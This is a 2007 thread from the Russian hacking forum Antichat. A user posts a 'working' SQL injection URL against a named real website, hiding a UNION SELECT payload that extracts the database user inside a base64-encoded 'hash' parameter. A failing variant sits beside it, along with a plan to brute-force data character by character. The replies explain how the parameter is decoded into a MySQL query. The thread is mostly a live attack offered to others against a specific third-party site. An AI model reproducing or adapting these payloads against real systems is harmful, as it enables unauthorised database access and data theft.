Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Crazy SQL :) (https://forum.antichat.xyz/showthread.php?t=32579)

guest3297 02.02.2007 20:38
Crazy SQL :)
 
Я тут потихонечку ищу новые реализации sql иньекций...
Нашел довольно забавный движок...
Очень порадовало вообщем :)

Рабочая иньекция.
Код:
http://www.zakachay.com/?action=regconf&hash=MTonLyoqL3VuaW9uLyoqL3NlbGVjdC8qKi8xLDIsdXNlcigpLDQsNSw2LDcsOCw5LDEvKjox
Не рабочая
Код:
http://www.zakachay.com/?action=regconf&hash=MTonLyoqL3VuaW9uLyoqL3NlbGVjdC8qKi8xLDIsbG9sZWcsNCw1LDYsNyw4LDksMS8qOjE
Реализовать можно только посимвольный перебор чем щас и займусь :)

Разбирайтесь :)

Termin@L 02.02.2007 20:52
Круто, тока я не врубаюсь, что там не даёт использовать функцию user()?

guest3297 02.02.2007 20:59
2Termin@L
:) ыыыыыы

Ig-FoX 02.02.2007 23:18
Я чтото не пойму вчем суть этой sql inj? Там параметры шыфруются и чтоли?

guest3297 02.02.2007 23:32
кодируються

Ig-FoX 02.02.2007 23:37
Для чего они воще кодируются?

Termin@L 02.02.2007 23:42
base64 зашифрованный пароль, который, декодируется, и после этого вставляется в mysql запрос, я так понял служит, кк авторизация. А [cash] просто зашифровал в бэйс64, запрос с union, и всё
2 [cash] ну дак почему, ни хъя не получается, сори если туплю, вечер как никак...


Время: 05:44